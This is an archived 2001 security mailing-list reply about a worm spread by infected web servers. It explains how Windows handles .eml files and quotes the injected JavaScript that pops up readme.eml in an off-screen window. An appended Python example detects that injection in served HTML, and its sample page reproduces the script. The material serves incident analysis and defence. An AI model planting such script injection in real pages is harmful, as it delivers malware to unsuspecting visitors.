Re: [unisog] Some more details on the worm

From: Jeffrey Altman (jaltmanat_private)
Date: Tue Sep 18 2001 - 17:54:51 PDT

    .eml is listed in the Registry as "Microsoft Internet Mail Message"
    with Content Type = "message/rfc822".  On my Windows 2000 system this
    will result in a program called
    
      \WINDOWS\system32\thumbvw.exe
    
    being executed using the Apartment threading model.
    
    - Jeff
    
    
    > When pages are served up by an infected server, it looks as though
    > readme.eml is 'attached' to them.  The server attempts to get the client to
    > open them through the following bit of code (from the .dll file):
    > 
    > <script language="JavaScript">window.open("readme.eml", null,
    > "resizable=no,top=6000,left=6000")</script>
    > 
    > According to Slashdot, this causes the file to be automatically opened and
    > executed by the client.  I haven't been able to confirm or deny that (but if
    > someone can, please do).
    > 
    > Regards,
    > Matt
    > 
    > 
    > --
    > Matt Davis, MCP
    > Intermediate Client Server Business Support Analyst
    > COUNTRY(SM) Insurance & Financial Services
    > 309-821-6288
    > mailto:matt.davisat_private
    > 
    
    
    
     Jeffrey Altman * Sr.Software Designer      C-Kermit 8.0 Beta available
     The Kermit Project @ Columbia University   includes Secure Telnet and FTP
     http://www.kermit-project.org/             using Kerberos, SRP, and 
     kermit-support@kermit-project.org          OpenSSL.  SSH soon to follow.
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
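Added example, not part of this thread: a check that scans HTML as served by a web server for the injection pattern Matt quoted (a script that opens a `.eml` file in a window positioned far off-screen), so an administrator can confirm that the pages a server hands out are clean. The sample page below is constructed for the example.

```python
import re
from html.parser import HTMLParser

# Constructed sample: a normal page with the script quoted in the thread
# appended after the document, the way the injected copy was described.
SAMPLE_PAGE = """<html><body><h1>Campus directory</h1></body></html>
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>"""

# window.open( "<something>.eml" ...  with any quoting or whitespace
OPEN_EML = re.compile(r'window\.open\s*\(\s*["\']([^"\']*\.eml)["\']',
                      re.IGNORECASE)
# top=NNNN / left=NNNN window-feature values
OFFSCREEN = re.compile(r'\b(top|left)\s*=\s*(\d+)', re.IGNORECASE)


class ScriptCollector(HTMLParser):
    """Collect the text of every <script> element in a document."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def find_eml_popups(html):
    """Return (filename, offscreen) for every script that pops up a .eml file."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for script in collector.scripts:
        flat = " ".join(script.split())  # undo line wrapping inside the call
        m = OPEN_EML.search(flat)
        if not m:
            continue
        # a window pushed far off the visible screen is meant to stay unseen
        offscreen = any(int(v) >= 1000 for _, v in OFFSCREEN.findall(flat))
        findings.append((m.group(1), offscreen))
    return findings


if __name__ == "__main__":
    for name, hidden in find_eml_popups(SAMPLE_PAGE):
        print(f"popup of {name!r}, off-screen={hidden}")
```

Run it over the HTML fetched from each virtual host; a hit on a page that should contain no script at all is a strong sign the server-side copy has been modified.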
    



    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 18:15:49 PDT